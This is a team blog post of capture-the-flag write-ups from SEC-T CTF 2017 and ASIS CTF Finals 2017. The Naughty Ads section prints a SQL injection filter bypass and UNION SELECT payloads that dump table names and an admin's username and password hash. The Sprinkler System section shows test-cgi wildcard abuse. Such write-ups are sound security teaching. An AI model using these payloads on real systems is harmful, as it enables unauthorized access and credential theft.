SEC-T CTF 2017 – Naughty Ads

Joining 2amResearch for the SEC-T CTF 2017 challenges here is a post from @akrotos solving the Naughty Ads web challenge.

Top of the challenge rabbit hole

Let’s head on over to the challenge page and load up Burp Suite. With a peak at the page’s html we see the the page contains an image with regions (wow, image maps were so 1995) with links to all the *ahem* ads, and a link to an admin page. Clicking on an ad took you to a simple page that has some suggestive description and a phone number. Unfortunately, the admin page doesn’t use the the Equifax default username and password of admin:admin. At this point it’s pretty obvious that we need to figure out a way of getting Agent Gill’s phone number into an ad by probably using the admin page.

Checking the robots.txt gives us the following:

User-agent: *
Disallow: /admin
Disallow: /*.phps

The admin page we already know about but using the *.phps path could be useful. Using admin.phps gives a 404 but index.phps was available, so let’s take a look.

<?php
require_once 'lib.php';
header('X-XSS-Protection: 0');
$cols = array(
"e8c4-437b-9476",
"849e-416e-acf7",
"7f9d-470f-8698",
"c8bb-4695-93f7",
"5fbc-4729-8821",
"3ad3-46c3-b975",
"f44f-4cc9-a5e0",
"0c3f-42c8-a0ae"
);

if(isset($_REQUEST['id'])){
if(preg_match("/'(?:\w*)\W*?[a-z].*(R|ELECT|OIN|NTO|HERE|NION)/i", $_REQUEST['id'])){
die("Attack detected!!!");
}
$ad = get_ad($_GET['id']);
?>
<HTML>
<HEAD>
<TITLE>NAUGHTY ADS ©1994</TITLE>
</HEAD>
<BODY BGCOLOR="WHITE">
<CENTER>
<?php echo $ad['description'] ?><br />
<a href="/">Home</a>
</CENTER>
</BODY>
</HTML>
<?php
die;
}

?>
<HTML>
<HEAD>
<TITLE>NAUGHTY ADS ©1994</TITLE>
</HEAD>
<BODY BGCOLOR="WHITE">
<CENTER>
<img class="ads" src="middle.png" width="800" height="600" usemap="#planetmap">
<map name="planetmap">
<area shape="rect" coords="287,93,523,261" href="?id=<?php echo array_pop($cols); ?>" alt="BDSM hookup">
<area shape="rect" coords="542,93,774,261" href="?id=<?php echo array_pop($cols); ?>" alt="Fat fetish">

<area shape="rect" coords="34,282,269,449" href="?id=<?php echo array_pop($cols); ?>" alt="Dirty mistress">
<area shape="rect" coords="292,282,521,449" href="?id=<?php echo array_pop($cols); ?>" alt="Femdom one night stand">
<area shape="rect" coords="545,282,777,449" href="?id=<?php echo array_pop($cols); ?>" alt="Waterboarding extasy">

<area shape="rect" coords="33,468,266,595" href="?id=<?php echo array_pop($cols); ?>" alt="Kinky nightmare">
<area shape="rect" coords="277,456,534,598" href="?id=<?php echo array_pop($cols); ?>" alt="Food fetish">
<area shape="rect" coords="547,466,780,599" href="?id=<?php echo array_pop($cols); ?>" alt="Whip experience">

<area shape="rect" coords="595,23,619,57" href="/admin" alt="Admin">
</map>
</CENTER>
</BODY>
</HTML>

Combing through the source give an interesting bit of PHP with a bit of Regex used to filter SQL injection attacks.

if(isset($_REQUEST['id'])){
    if(preg_match("/'(?:\w*)\W*?[a-z].*(R|ELECT|OIN|NTO|HERE|NION)/i", $_REQUEST['id'])){
        die("Attack detected!!!");
    }
$ad = get_ad($_GET['id']);

This bit had us stumped for a while, but with help of an old hardcore PHP developer he pointed out there is a subtle difference between $_REQUEST[] and $_GET[]. Thank you Philip Fulcher. We can exploit this difference to bypass the regex by creating two ‘id’ parameters, one in the URL and one in the request body, and change the HTTP GET to a POST. $_REQUEST will take the id that’s in the request body instead of the URL, effectively bypassing the regex filter. Example request here

The application is expecting a single value returned from the query or else it thrown an HTTP 500 error. Setting the malicious id parameter to the string below shows how this works.

id=0000-0000-0000' UNION SELECT USER() %23

‘%23’ is ‘#’ URL Encoded. This is needed or else the server returns a 400. Not sure why, but let’s just roll with it.

With a working Blind SQL injection vuln we can probe the database for more info. Guessing the backend is a MySQL database, because PHP devs don’t know how to use anything else, we can use GROUP_CONCAT() to return the list of tables in a single comma separated value. If we filter out the system tables in the information schema by setting id to the below string, we can see there are two user tables in the database: ads, and login.

id=0000-0000-0000' UNION SELECT GROUP_CONCAT(table_name) FROM INFORMATION_SCHEMA.tables %23

By concatenating all the columns in the login table with a select gives us a very nice reward.

id=0000-0000-0000' UNION SELECT CONCAT(id, ',', username,',', password) FROM login %23

1,webmasterofdoom3755,5ebe2294ecd0e0f08eab7690d2a6ee69


5ebe2294ecd0e0f08eab7690d2a6ee69 is a MD5 hash of the string ‘secret’. Plugging in the username and password into the login prompts gets us into the admin page. We see a simple form to plug in a phone number, description, and image to upload. Taking the phone number from the start of the challenge and submitting the form gives ups the flag.

Flag: SECT{~tr4nsv3stiT3s_w3lc0me_t00~}

SEC-T CTF 2017 – Report

Report was a nice little challenge, we were presented with a PDF file in which Mr. Belford  had written up for the FBI of the Gibson hack by Joey. The challenge alluded to Mr. Belford hiding something within the file. An initial look at the Report.pdf file nothing really stood out, except some troll flags 😀

So we took this challenge to the command line. Our first pass at the file, running strings and other useful commands nothing really stood out to us. Giving our tired eyes a break, we came back to Report.pdf later in the CTF timeframe. Again running strings we started to notice a pattern specifically within object 146:

We noticed that the last two digits of the second column of object 146 had similar hex digits/ascii printable characters.  One thing to note is the string was in reverse so we had to start from the bottom and make our way to the top.

We tried or hand at cutting this column out and running some command line kung fu that totally failed… a little bit but when the output was returned we were hopeful and caught a glimpse at the flag 😀

So we decided to just take the string of hex and use xxd to convert the hex to ascii.

Flag: SECT{N07_N1C3_T0_BR3Ak_LUCY}

SEC-T CTF 2017 – Acid Burn

Acid burn was a fun challenge and given the hint within the challenge “hiding something in her background image” we figured it was a stego challenge 🙂

Upon downloading the file we were presented with a chall.webp which we have to admit we were not too familiar with .webp files types so we did a little research first.

Given that it was a stego challenge we decided to run the basics on the file strings, pnginfo, binwalk and even loaded the image in StegSolve but nothing stood out as unusual or a flag.  So we decided to convert the file to a PNG and for this task we used XnConvert  which worked really well.

Once we had the file converted we re-ran our commands and loaded the file back into StegSolve and scrolling through the different image planes the image began to reveal something interesting for us:

We knew we discovered the flag by the leading “SECT{” at the to of the image, we wanted to try and get a clearer view of the flag so we tweaked StegSolve a little more until we could make out the flag.

Overall this was a great stego challenge 😀

Flag: SECT{I_LOVE_CRASH_OVERFLOW_BUT_I_CAN_NOT_TELL_HIM_HOW_I_FEEL_ABOUT_HIM}

SEC-T CTF 2017 – Sprinkler System

Given the challenge we browsed over to http://sprinklers.alieni.se/ and were presented with an old administrator interface for the sprinkler system.

We took a look at the usual avenues when presented with a web challenge and browsed over to /robots.txt

Noticing the /cgi-bin/test-cgi dir we immediately browsed to that web directory and discovered a test script report page:

Adding an extra / after test-cgi we noticed that we could view the web root directory “PATH_TRANSLATED =/var/www/html/index.html” with this clue we knew there were possibilities of files and directories.

So a bit of searching and we came across two interesting links first one on insecure.org and the other related to a CVE-1999-0070. Given this information we started testing different query commands against the web server until we used http://sprinklers.alieni.se/cgi-bin/test-cgi?* which gave some interesting results and gave us the feeling we were going to need an umbrella 🙂

We now see the “QUERY_STRING = enable_sprinkler_system test-cgi” and using this query string to browse to http://sprinklers.alieni.se/cgi-bin/enable_sprinkler_system  gave use rewarding results :

 

Flag: SECT{-p00l_On_t3h_r00f_must_h@v3_A_l3ak!-}

SEC-T CTF 2017 – Handle

First off thanks to the whole SEC-T team, we really enjoyed the Hackers 1995 theme, HACK THE PLANET!  As with most CTFs we had a freebie which was Joey needing a handle. Easily found in the IRC channel topic.

Browsing to the IRC we get the flag:

 

Flag: SECT{CRASH_OVERR1D3}

ASIS CTF Finals 2017 – Dig Dug

In this post we wanted to share our solution to the ASIS CTF Finals 2017 Dig Dug challenge. Below is the challenge we were faced with:

Seeing that this was a web challenge we simple clicked on the link and immediately we were redirected to an obscure web page.

Can you dig it?!

Noticing the less than obvious clue on the page and being familiar with the dig command from our analyst days we immediately went to the terminal and issued the dig command against the site dibx.asisctf.com running a reverse lookup on the IP address.

The reverse lookup with dig uncovered the hostname airplane.asisctf.com. Browsing to that site we were once again faced with another obscure webpage with some interesting clues to take things offline and “Enable Airplane Mode” 😀

We decided to take a quick look at the source code of the webpage and the given links and files hosted on the site and came across the file js.js, viewing this file we notice a very large variable with hex data.

Taking the advice of the website admin to take offline, we downloaded the website using wget to recursively download all files from the website.

Once we had all files downloaded, having a hunch that the js.js file had something interesting for us we focused our efforts on decoding that variable and created a simple page to get the results we needed.

Finally we had our simple html page created with the long variable that we had discovered from js.js file, but once again given a very strange result.

 

We figured that at this point the trolling was about over and since this was a web warmup decided to search for “ASIS” throughout the page. The results of the search were rewarding 😀

We ended up finding the flag within the page.  “ASIS{_just_Go_Offline_When_you_want_to_be_creative_!}”

Overall the ASIS CTF was a blast and we hope to join many more!